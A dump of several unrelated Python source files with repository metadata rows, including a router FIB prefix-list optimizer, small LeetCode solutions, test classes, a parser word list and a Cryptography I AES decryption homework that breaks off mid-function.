lpm = [p['key'] for p in sir.get_top_prefixes(
start_time=start_time,
end_time=end_time,
limit_prefixes=limit_lpm,
net_masks=conf['lem_prefixes'],
filter_proto=4,
exclude_net_masks=1,).result]
return lem, lpm
def build_prefix_lists():
logger.debug('Storing prefix lists in disk')
def _build_pl(name, prefixes):
pl = ''
for s, p in prefixes.iteritems():
prefix, mask = p.split('/')
if mask == '32' or (prefix == '' and mask == '0'):
continue
pl += 'seq {} permit {}\n'.format(s, p)
with open('{}/{}'.format(conf['path'], name), "w") as f:
f.write(pl)
_build_pl('fib_optimizer_lpm_v4', lpm_prefixes)
_build_pl('fib_optimizer_lem_v4', lem_prefixes)
def install_prefix_lists():
logger.debug('Installing the prefix-lists in the system')
cli_lpm = shlex.split('printf "refresh ip prefix-list fib_optimizer_lpm_v4"'.format(
conf['path']))
cli_lem = shlex.split('printf "refresh ip prefix-list fib_optimizer_lem_v4"'.format(
conf['path']))
cli = shlex.split('sudo ip netns exec default FastCli -p 15 -A')
p_lpm = subprocess.Popen(cli_lpm, stdout=subprocess.PIPE)
p_cli = subprocess.Popen(cli, stdin=p_lpm.stdout, stdout=subprocess.PIPE)
time.sleep(30)
p_lem = subprocess.Popen(cli_lem, stdout=subprocess.PIPE)
p_cli = subprocess.Popen(cli, stdin=p_lem.stdout, stdout=subprocess.PIPE)
def merge_pl():
logger.debug('Merging new prefix-list with existing ones')
def _merge_pl(pl, pl_file, max_p):
if os.path.isfile(pl_file):
logger.debug('Prefix list {} already exists. Merging'.format(pl_file))
with open(pl_file, 'r') as f:
original_pl = dict()
for line in f.readlines():
_, seq, permit, prefix = line.split(' ')
original_pl[prefix.rstrip()] = int(seq)
if len(original_pl) * 0.75 > len(pl):
msg = 'New prefix list ({}) is more than 25%% smaller than the new one ({})'.format(len(original_pl),
len(pl))
logger.error(msg)
raise Exception(msg)
new_prefixes = set(pl) - set(original_pl.keys())
existing_prefixes = set(pl) & set(original_pl.keys())
new_pl = dict()
for p in existing_prefixes:
new_pl[original_pl[p]] = p
empty_pos = sorted(list(set(xrange(1, int(max_p) + 1)) - set(original_pl.values())))
for p in new_prefixes:
new_pl[empty_pos.pop(0)] = p
return new_pl
else:
logger.debug('Prefix list {} does not exist'.format(pl_file))
i = 1
new = dict()
for p in pl:
new[i] = p
i += 1
return new
lem = _merge_pl(lem_prefixes, '{}/fib_optimizer_lem_v4'.format(conf['path']), conf['max_lem_prefixes'])
lpm = _merge_pl(lpm_prefixes, '{}/fib_optimizer_lpm_v4'.format(conf['path']), conf['max_lpm_prefixes'])
return lem, lpm
def purge_old_data():
logger.debug('Purging old data')
date = datetime.datetime.now() - datetime.timedelta(hours=conf['purge_older_than'])
date_text = date.strftime('%Y-%m-%dT%H:%M:%S')
logger.debug('Deleting BGP data older than: {}'.format(date_text))
sir.purge_bgp(older_than=date_text)
logger.debug('Deleting flow data older than: {}'.format(date_text))
sir.purge_flows(older_than=date_text)
if __name__ == "__main__":
if len(sys.argv) < 2:
print 'You have to specify the base URL. For example: {} http://127.0.0.1:5000'.format(sys.argv[0])
sys.exit(0)
elif sys.argv[1] == '-h' or sys.argv[1] == '--help':
print 'You have to specify the base URL. For example: {} http://127.0.0.1:5000'.format(sys.argv[0])
sys.exit(1)
logger.info('Starting fib_optimizer')
sir = pySIR(sys.argv[1], verify_ssl=False)
# We get the configuration for our application
conf = get_variables()
# The time range we want to process
start_time, end_time = get_date_range()
# We get the Top prefixes. Included and excluded prefixes are merged as well
lem_prefixes, lpm_prefixes = get_top_prefixes()
# If the prefix list exists already we merge the data
lem_prefixes, lpm_prefixes = merge_pl()
# We build the files with the prefix lists
build_prefix_lists()
install_prefix_lists()
purge_old_data()
logger.info('End fib_optimizer')
| 30.844 | 117 | 0.606925 | 1,082 | 7,711 | 4.11183 | 0.213494 | 0.032142 | 0.008092 | 0.016183 | 0.244999 | 0.235783 | 0.20499 | 0.142953 | 0.111486 | 0.090357 | 0 | 0.011478 | 0.265595 | 7,711 | 249 | 118 | 30.967871 | 0.774148 | 0.068863 | 0 | 0.132353 | 0 | 0.014706 | 0.199665 | 0.01474 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.073529 | null | null | 0.029412 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
52c9891e030597761f62c3109bb03c2ff213dd4d | 281 | py | Python | intro/hello.py | ANU-WALD/acawsi | f6f340b59de8814173ab7dc8195c0fced53e652e | [
"MIT"
] | 1 | 2020-02-03T03:05:44.000Z | 2020-02-03T03:05:44.000Z | intro/hello.py | ANU-WALD/acawsi | f6f340b59de8814173ab7dc8195c0fced53e652e | [
"MIT"
] | null | null | null | intro/hello.py | ANU-WALD/acawsi | f6f340b59de8814173ab7dc8195c0fced53e652e | [
"MIT"
] | null | null | null |
name = "Sharalanda"
age = 10
hobbies = ["draw", "swim", "dance"]
address = {"city": "Sebastopol", "Post Code": 1234, "country": "Enchantia"}
print("My name is", name)
print("I am", age, "years old")
print("My favourite hobbie is", hobbies[0])
print("I live in", address["city"])
| 25.545455 | 75 | 0.637011 | 40 | 281 | 4.475 | 0.7 | 0.122905 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029046 | 0.142349 | 281 | 10 | 76 | 28.1 | 0.713693 | 0 | 0 | 0 | 0 | 0 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
52ca2cad175cb01038bfad01648331f9f620e47e | 537 | py | Python | python/array/1550_three_consecutive_odds.py | linshaoyong/leetcode | ea052fad68a2fe0cbfa5469398508ec2b776654f | [
"MIT"
] | 6 | 2019-07-15T13:23:57.000Z | 2020-01-22T03:12:01.000Z | python/array/1550_three_consecutive_odds.py | linshaoyong/leetcode | ea052fad68a2fe0cbfa5469398508ec2b776654f | [
"MIT"
] | null | null | null | python/array/1550_three_consecutive_odds.py | linshaoyong/leetcode | ea052fad68a2fe0cbfa5469398508ec2b776654f | [
"MIT"
] | 1 | 2019-07-24T02:15:31.000Z | 2019-07-24T02:15:31.000Z | class Solution(object):
def threeConsecutiveOdds(self, arr):
"""
:type arr: List[int]
:rtype: bool
"""
odds = 0
for a in arr:
if a % 2 == 1:
odds += 1
if odds >= 3:
return True
else:
odds = 0
return False
def test_three_consecutive_odds():
s = Solution()
assert s.threeConsecutiveOdds([2, 6, 4, 1]) is False
assert s.threeConsecutiveOdds([1, 2, 34, 3, 4, 5, 7, 23, 12])
| 23.347826 | 65 | 0.463687 | 63 | 537 | 3.904762 | 0.603175 | 0.04065 | 0.219512 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.071429 | 0.426443 | 537 | 22 | 66 | 24.409091 | 0.727273 | 0.061453 | 0 | 0.133333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 1 | 0.133333 | false | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
52cf7e995d7f53da62cf8abc38f6b4412b3b46df | 717 | py | Python | test/manager_drmaa_test.py | jmchilton/pulsar | 783b90cf0bce893a11c347fcaf6778b98e0bb062 | [
"Apache-2.0"
] | null | null | null | test/manager_drmaa_test.py | jmchilton/pulsar | 783b90cf0bce893a11c347fcaf6778b98e0bb062 | [
"Apache-2.0"
] | null | null | null | test/manager_drmaa_test.py | jmchilton/pulsar | 783b90cf0bce893a11c347fcaf6778b98e0bb062 | [
"Apache-2.0"
] | null | null | null | from .test_utils import (
BaseManagerTestCase,
skip_unless_module
)
from pulsar.managers.queued_drmaa import DrmaaQueueManager
class DrmaaManagerTest(BaseManagerTestCase):
def setUp(self):
super(DrmaaManagerTest, self).setUp()
self._set_manager()
def tearDown(self):
super(DrmaaManagerTest, self).setUp()
self.manager.shutdown()
def _set_manager(self, **kwds):
self.manager = DrmaaQueueManager('_default_', self.app, **kwds)
@skip_unless_module("drmaa")
def test_simple_execution(self):
self._test_simple_execution(self.manager)
@skip_unless_module("drmaa")
def test_cancel(self):
self._test_cancelling(self.manager)
| 24.724138 | 71 | 0.701534 | 78 | 717 | 6.166667 | 0.384615 | 0.091476 | 0.099792 | 0.120582 | 0.274428 | 0.274428 | 0 | 0 | 0 | 0 | 0 | 0 | 0.193863 | 717 | 28 | 72 | 25.607143 | 0.83218 | 0 | 0 | 0.2 | 0 | 0 | 0.026499 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.1 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
52dbfba445e18389a6ca13cbc5580b99d308ec2f | 208 | py | Python | html/semantics/scripting-1/the-script-element/module/resources/delayed-modulescript.py | meyerweb/wpt | f04261533819893c71289614c03434c06856c13e | [
"BSD-3-Clause"
] | 14,668 | 2015-01-01T01:57:10.000Z | 2022-03-31T23:33:32.000Z | html/semantics/scripting-1/the-script-element/module/resources/delayed-modulescript.py | meyerweb/wpt | f04261533819893c71289614c03434c06856c13e | [
"BSD-3-Clause"
] | 7,642 | 2018-05-28T09:38:03.000Z | 2022-03-31T20:55:48.000Z | html/semantics/scripting-1/the-script-element/module/resources/delayed-modulescript.py | meyerweb/wpt | f04261533819893c71289614c03434c06856c13e | [
"BSD-3-Clause"
] | 5,941 | 2015-01-02T11:32:21.000Z | 2022-03-31T16:35:46.000Z | import time
def main(request, response):
delay = float(request.GET.first(b"ms", 500))
time.sleep(delay / 1E3)
return [(b"Content-type", b"text/javascript")], u"export let delayedLoaded = true;"
| 26 | 87 | 0.673077 | 30 | 208 | 4.666667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028736 | 0.163462 | 208 | 7 | 88 | 29.714286 | 0.775862 | 0 | 0 | 0 | 0 | 0 | 0.293269 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
52e56046055c96a92245aac6c622f673ad51945f | 1,962 | py | Python | tests/test_dork_erd.py | msudenvercs/Dork | 601cbb21398ac8edf5e688db2089ed8805bbdf00 | [
"MIT"
] | 1 | 2021-04-04T20:40:18.000Z | 2021-04-04T20:40:18.000Z | tests/test_dork_erd.py | msudenvercs/Dork | 601cbb21398ac8edf5e688db2089ed8805bbdf00 | [
"MIT"
] | 4 | 2019-06-04T00:59:46.000Z | 2019-06-08T17:22:19.000Z | tests/test_dork_erd.py | zenostrash/dork | 601cbb21398ac8edf5e688db2089ed8805bbdf00 | [
"MIT"
] | 4 | 2019-05-29T04:56:28.000Z | 2019-05-30T18:17:55.000Z | # -*- coding: utf-8 -*-
"""Basic tests for state and entity relationships in dork
"""
import dork.types
from tests.utils import has_many, is_a
def test_items_exist():
"""the dork module should define an Item
"""
assert "Item" in vars(dork.types)
is_a(dork.types.Item, type)
def test_holders_exist():
"""the dork module should define an Holder
"""
assert "Holder" in vars(dork.types)
is_a(dork.types.Holder, type)
def test_players_exist():
"""the dork module should define an Player
"""
assert "Player" in vars(dork.types)
is_a(dork.types.Player, type)
def test_rooms_exist():
"""the dork module should define an Room
"""
assert "Room" in vars(dork.types)
is_a(dork.types.Room, type)
def test_path_exists():
"""the dork module should define an Path
"""
assert "Path" in vars(dork.types)
is_a(dork.types.Path, type)
def test_map_exists():
"""the dork module should define an Map
"""
assert "Map" in vars(dork.types)
is_a(dork.types.Map, type)
def test_holder_has_many_items():
"""A Holder should have many Items
"""
has_many(dork.types.Holder, "holder", dork.types.Item, "items")
def test_player_is_a_holder(player):
"""A Player should be a Holder
"""
is_a(player, dork.types.Holder)
def test_room_is_a_holder(room):
"""A Room should be a Holder
"""
is_a(room, dork.types.Holder)
def test_room_has_many_players():
"""A Room should have many players
"""
has_many(dork.types.Room, "room", dork.types.Player, "players")
def test_room_has_many_paths():
"""A Room should have many Paths through exits and entrances.
"""
has_many(dork.types.Room, "entrance", dork.types.Path, "entrances")
has_many(dork.types.Room, "exit", dork.types.Path, "exits")
def test_map_has_many_rooms():
"""A Map should have many Rooms
"""
has_many(dork.types.Map, "map", dork.types.Room, "rooms")
| 23.082353 | 71 | 0.664628 | 301 | 1,962 | 4.162791 | 0.166113 | 0.179569 | 0.062251 | 0.090982 | 0.466879 | 0.400638 | 0.284118 | 0.12929 | 0 | 0 | 0 | 0.000639 | 0.201835 | 1,962 | 84 | 72 | 23.357143 | 0.799489 | 0.292559 | 0 | 0 | 0 | 0 | 0.062831 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 1 | 0.363636 | false | 0 | 0.060606 | 0 | 0.424242 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
52e589ec26ec934cedbbb77cf5a8fda7e7d9cd96 | 1,115 | py | Python | woffle/data/parse.py | Finnkauski/woffle | 746ceb22ef03232f7963db6f7fb2f95fe0164a07 | [
"MIT"
] | null | null | null | woffle/data/parse.py | Finnkauski/woffle | 746ceb22ef03232f7963db6f7fb2f95fe0164a07 | [
"MIT"
] | null | null | null | woffle/data/parse.py | Finnkauski/woffle | 746ceb22ef03232f7963db6f7fb2f95fe0164a07 | [
"MIT"
] | null | null | null | """
text cleaning
"""
#-- Imports ---------------------------------------------------------------------
# base
import functools
import re
# third party
import toml
# project
from woffle.functions.compose import compose
#-- Definitions -----------------------------------------------------------------
#-- cleaning
#NOTE: all functions are endomorphic String -> String so their composition does
# not need to be tested and they can be composed in any order
# read the config files for the operations
with open('etc/regex') as f:
replace = toml.load(f)
with open('etc/encoding') as f:
encode = toml.load(f)
def regexes(r : dict, x : str) -> str:
return compose(*[functools.partial(re.sub, i, j) for i,j in r.items()])(x)
replacements = functools.partial(regexes, replace)
encoding = functools.partial(regexes, encode)
def unlines(x : str) -> str:
return x.replace('\n', '')
# Composition -----------------------------------------------------------------
parse = compose( encoding
, replacements
, unlines
, str.strip
)
| 24.23913 | 81 | 0.528251 | 121 | 1,115 | 4.867769 | 0.578512 | 0.081494 | 0.037351 | 0.044143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 1,115 | 45 | 82 | 24.777778 | 0.660314 | 0.423318 | 0 | 0 | 0 | 0 | 0.036741 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.210526 | 0.105263 | 0.421053 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
52edcb7aea820f4031994c44df4c877102b60d05 | 385 | py | Python | Chapter 4 - Lists & Tuples/01_list.py | alex-dsouza777/Python-Basics | 8f1c406f2319cd65b5d54dfea990d09fa69d9adf | [
"MIT"
] | null | null | null | Chapter 4 - Lists & Tuples/01_list.py | alex-dsouza777/Python-Basics | 8f1c406f2319cd65b5d54dfea990d09fa69d9adf | [
"MIT"
] | null | null | null | Chapter 4 - Lists & Tuples/01_list.py | alex-dsouza777/Python-Basics | 8f1c406f2319cd65b5d54dfea990d09fa69d9adf | [
"MIT"
] | 1 | 2021-04-21T10:23:08.000Z | 2021-04-21T10:23:08.000Z | #Create a list using []
a = [1,2,3,7,66]
#print the list using print() function
print(a)
#Access using index using a[0], a[1], ....
print(a[2])
#Changing the value of the list
a[0] = 777
print(a)
#We can create a list with items of different type
b = [77,"Root",False,6.9]
print(b)
#List Slicing
friends = ["Root","Groot","Sam","Alex",99]
print(friends[0:3])
print(friends[-4:])
| 16.73913 | 50 | 0.649351 | 73 | 385 | 3.424658 | 0.520548 | 0.072 | 0.088 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.067692 | 0.155844 | 385 | 22 | 51 | 17.5 | 0.701538 | 0.496104 | 0 | 0.2 | 0 | 0 | 0.106952 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.6 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
52fa77fc729c94ac81a3d83288fe663868091162 | 5,421 | py | Python | 2parser/word_lists.py | formalabstracts/CNL-CIC | c857ee0d52b4ba91dd06a51c8f9f3ec2749ca0eb | [
"MIT"
] | 14 | 2019-06-27T16:34:39.000Z | 2021-01-07T18:13:04.000Z | 2parser/word_lists.py | formalabstracts/CNL-CIC | c857ee0d52b4ba91dd06a51c8f9f3ec2749ca0eb | [
"MIT"
] | 8 | 2019-10-17T06:09:51.000Z | 2020-03-25T15:51:32.000Z | 2parser/word_lists.py | formalabstracts/CNL-CIC | c857ee0d52b4ba91dd06a51c8f9f3ec2749ca0eb | [
"MIT"
] | 17 | 2019-06-27T16:34:53.000Z | 2020-08-15T01:30:32.000Z | singular = [
'this','as','is','thesis','hypothesis','less','obvious','us','yes','cos',
'always','perhaps','alias','plus','apropos',
'was','its','bus','his','is','us',
'this','thus','axis','bias','minus','basis',
'praxis','status','modulus','analysis',
'aparatus'
]
invariable = [ #frozen_list - cannot be given a synonym
'a','an','all','and','any','are','as','assume','be','by',
'case','classifier',
'coercion','conjecture','contradiction','contrary','corollary','declare',
'def',
'define','defined','definition','denote','division','do','document',
'does','dump','each','else','end','enddivision','endsection',
'endsubdivision','endsubsection','endsubsubsection','equal',
'equation','error','enter','every','exhaustive','exist','exit',
'false','fix','fixed','for','forall','formula','fun','function','has','have',
'having','hence','holding','hypothesis','if','iff','in','inferring',
'indeed','induction','inductive','introduce','is','it','left','lemma',
'let','library','make','map','match','moreover','mutual','namespace',
'no','not','notational','notation',
'notationless','obvious','of','off','on','only','ontored','or','over',
'pairwise','parameter','precedence','predicate','printgoal',
'proof','prop','property','prove','proposition',
'propped','qed','quotient','read','record','register','recursion','right',
'said','say','section','show','some','stand','structure','subdivision',
'subsection','subsubsection','such','suppose','synonym','take','that',
'the','then','theorem','there','therefore','thesis','this','timelimit',
'to','total','trivial','true','type','unique','us',
'warning','we','well','welldefined','well_defined','well_propped',
'where','with','write','wrong','yes',
#(* plural handled by sing 'classifiers', 'exists','implement',
# 'parameters','properties','propositions','synonyms','types',
]
transition = [ #phrase_list_transition_words
'a basic fact is','accordingly','additionally','again','also','and yet','as a result',
'as usual','as we have seen','as we see','at the same time','besides','but',
'by definition','certainly','clearly','computations show','consequently',
'conversely','equally important','explicitly','finally','first','for example',
'for instance','for simplicity','for that reason','for this purpose','further',
'furthermore','generally','hence','here','however','importantly','in addition',
'in any event','in brief','in consequence','in contrast','in contrast to this',
'in each case','in fact','in general','in other words','in particular','in short',
'in sum','in summary','in the present case','in the same way','in this computation',
'in this sense','indeed','it follows','it is clear','it is enough to show',
'it is known','it is routine','it is trivial to see','it is understood',
'it turns out','last','likewise','more precisely','moreover','most importantly',
'neverthess','next','nonetheless','note',
'notice','now','observe','obviously','of course','on the contrary','on the other hand',
'on the whole','otherwise','second','similarly','so','specifically','still',
'that is','the point is','then','therefore','third','this gives','this implies',
'this means','this yields','thus','thus far','to begin with','to this end',
'trivially','we claim','we emphasize','we first show','we get','we have seen',
'we have','we know','we check','we may check','we obtain','we remark','we say','we see',
'we show','we understand','we write','recall','we recall',
'without loss of generality','yet'
]
preposition_list = [
'aboard','about','above','according to', 'across', 'against', 'ahead of',
'along','alongside','amid','amidst','among','around','at','atop','away from',
'before',
'behind','below','beneath','beside','between','beyond','by','concerning','despite',
'except','except at','excluding','following',
'from','in','in addition to','in place of','in regard to',
'inside','instead of','into','near','next to','of',
'off','on','on behalf of','on top of','onto','opposite','out','out of',
'outside','outside of',
'over','owing to','per','prior to','regarding','save','through',
'throughout','till','to','towards','under','until',
'up','up to','upon','with','with respect to','wrt','within','without'
# 'for', 'as', 'like', 'after', 'round', 'plus', 'since', 'than', 'past',
# 'during',
# synonyms with\~respect\~to/wrt
]
prim_list = [
'prim_classifier',
'prim_term_op_controlseq',
'prim_binary_relation_controlseq',
'prim_propositional_op_controlseq',
'prim_type_op_controlseq',
'prim_term_controlseq',
'prim_type_controlseq',
'prim_lambda_binder',
'prim_pi_binder',
'prim_binder_prop',
'prim_typed_name',
'prim_adjective',
'prim_adjective_multisubject',
'prim_simple_adjective',
'prim_simple_adjective_multisubject',
'prim_field_term_accessor',
'prim_field_type_accessor',
'prim_field_prop_accessor',
'prim_definite_noun',
'prim_identifier_term',
'prim_identifier_type',
'prim_possessed_noun',
'prim_verb',
'prim_verb_multisubject',
'prim_structure',
'prim_type_op',
'prim_type_word',
'prim_term_op',
'prim_binary_relation_op',
'prim_propositional_op',
'prim_relation'
]
| 47.13913 | 92 | 0.635307 | 658 | 5,421 | 5.121581 | 0.575988 | 0.007122 | 0.014243 | 0.009496 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12636 | 5,421 | 114 | 93 | 47.552632 | 0.711571 | 0.057738 | 0 | 0 | 0 | 0 | 0.650196 | 0.06451 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.029126 | 0 | 0.029126 | 0.009709 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
52fc73cfa1b8ed4c7016c7ea3dfc2e30bd7fa214 | 548 | py | Python | answers/leetcode/Summary Ranges/Summary Ranges.py | FeiZhan/Algo-Collection | 708c4a38112e0b381864809788b9e44ac5ae4d05 | [
"MIT"
] | 3 | 2015-09-04T21:32:31.000Z | 2020-12-06T00:37:32.000Z | answers/leetcode/Summary Ranges/Summary Ranges.py | FeiZhan/Algo-Collection | 708c4a38112e0b381864809788b9e44ac5ae4d05 | [
"MIT"
] | null | null | null | answers/leetcode/Summary Ranges/Summary Ranges.py | FeiZhan/Algo-Collection | 708c4a38112e0b381864809788b9e44ac5ae4d05 | [
"MIT"
] | null | null | null | class Solution(object):
def summaryRanges(self, nums):
"""
:type nums: List[int]
:rtype: List[str]
"""
range_list = []
for i in range(len(nums)):
if i > 0 and nums[i - 1] + 1 == nums[i]:
range_list[-1][1] = nums[i]
else:
range_list.append([nums[i], nums[i]])
str_list = [str(range_list[i][0]) + ("->" + str(range_list[i][1]) if range_list[i][0] != range_list[i][1] else "") for i in range(len(range_list))]
return str_list
| 34.25 | 155 | 0.492701 | 78 | 548 | 3.333333 | 0.307692 | 0.276923 | 0.153846 | 0.123077 | 0.107692 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024523 | 0.330292 | 548 | 15 | 156 | 36.533333 | 0.683924 | 0.071168 | 0 | 0 | 0 | 0 | 0.004193 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
52fddc869556dcf56427929cc447dd8453bf656c | 789 | py | Python | amplpy/tests/TestBase.py | dish59742/amplpy | 9309a947b74dcc524a07809a68bf32d93e9f0a48 | [
"BSD-3-Clause"
] | null | null | null | amplpy/tests/TestBase.py | dish59742/amplpy | 9309a947b74dcc524a07809a68bf32d93e9f0a48 | [
"BSD-3-Clause"
] | 4 | 2021-06-08T22:16:26.000Z | 2022-03-12T00:48:56.000Z | amplpy/tests/TestBase.py | dish59742/amplpy | 9309a947b74dcc524a07809a68bf32d93e9f0a48 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function, absolute_import, division
from builtins import map, range, object, zip, sorted
from .context import amplpy
import unittest
import tempfile
import shutil
import os
class TestBase(unittest.TestCase):
def setUp(self):
self.ampl = amplpy.AMPL()
self.dirpath = tempfile.mkdtemp()
def str2file(self, filename, content):
fullpath = self.tmpfile(filename)
with open(fullpath, 'w') as f:
print(content, file=f)
return fullpath
def tmpfile(self, filename):
return os.path.join(self.dirpath, filename)
def tearDown(self):
self.ampl.close()
shutil.rmtree(self.dirpath)
if __name__ == '__main__':
unittest.main()
| 23.205882 | 64 | 0.665399 | 97 | 789 | 5.268041 | 0.56701 | 0.064579 | 0.046967 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003273 | 0.225602 | 789 | 33 | 65 | 23.909091 | 0.833061 | 0.053232 | 0 | 0 | 0 | 0 | 0.012081 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.173913 | false | 0 | 0.304348 | 0.043478 | 0.608696 | 0.086957 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
52fea36dd1d5595eb45032e212c7c224730f7fd2 | 2,179 | py | Python | week2/decrypt.py | vtnil/Cryptography-I-Homework | 1f2bcce5ecfdf8472ddaaaa45eb25266f0279224 | [
"MIT"
] | null | null | null | week2/decrypt.py | vtnil/Cryptography-I-Homework | 1f2bcce5ecfdf8472ddaaaa45eb25266f0279224 | [
"MIT"
] | 1 | 2020-07-31T05:21:07.000Z | 2020-10-23T17:28:12.000Z | week2/decrypt.py | vtnil/Cryptography-I-Homework | 1f2bcce5ecfdf8472ddaaaa45eb25266f0279224 | [
"MIT"
] | null | null | null | # vtnil write for Cryptography1 week2 homework
# ppt https://crypto.stanford.edu/~dabo/cs255/lectures/PRP-PRF.pdf
from Crypto.Cipher import AES
from binascii import a2b_hex
from math import ceil
questions = [
{"key": "140b41b22a29beb4061bda66b6747e14",
"ct": "4ca00ff4c898d61e1edbf1800618fb2828a226d160dad07883d04e008a7897ee2e4b7465d5290d0c0e6c6822236e1daafb94ffe0c5da05d9476be028ad7c1d81"},
{"key": "140b41b22a29beb4061bda66b6747e14",
"ct": "5b68629feb8606f9a6667670b75b38a5b4832d0f26e1ab7da33249de7d4afc48e713ac646ace36e872ad5fb8a512428a6e21364b0c374df45503473c5242a253"},
{"key": "36f18357be4dbd77f050515c73fcf9f2",
"ct": "69dda8455c7dd4254bf353b773304eec0ec7702330098ce7f7520d1cbbb20fc388d1b0adb5054dbd7370849dbf0b88d393f252e764f1f5f7ad97ef79d59ce29f5f51eeca32eabedd9afa9329"},
{"key": "36f18357be4dbd77f050515c73fcf9f2",
"ct": "770b80259ec33beb2561358a9f2dc617e46218c0a53cbeca695ae45faa8952aa0e311bde9d4e01726d3184c34451"},
]
BLOCK_SIZE = 16
MODEL_CBC = 'cbc'
MODEL_CTR = 'ctr'
AES.block_size = BLOCK_SIZE
def decrypt(question, mode):
key = a2b_hex(question['key'])
ctb = a2b_hex(question['ct'])
iv = ctb[:BLOCK_SIZE]
ct = ctb[BLOCK_SIZE:]
plain = []
cipher = AES.new(key)
if mode == MODEL_CBC:
_iv = iv
for i in range(0, int(len(ct) / BLOCK_SIZE)):
_b = ct[BLOCK_SIZE * i: BLOCK_SIZE * (i + 1)]
_k = cipher.decrypt(_b)
plain += [a ^ b for (a, b) in zip(_iv, _k)]
_iv = _b
# remove padding
_len = plain[-1]
if [_len] * _len == plain[-_len:]:
plain = plain[:-_len]
else:
for i in range(0, ceil(len(ct) / BLOCK_SIZE)):
# Be careful!!! Here is ENCRYPT!!
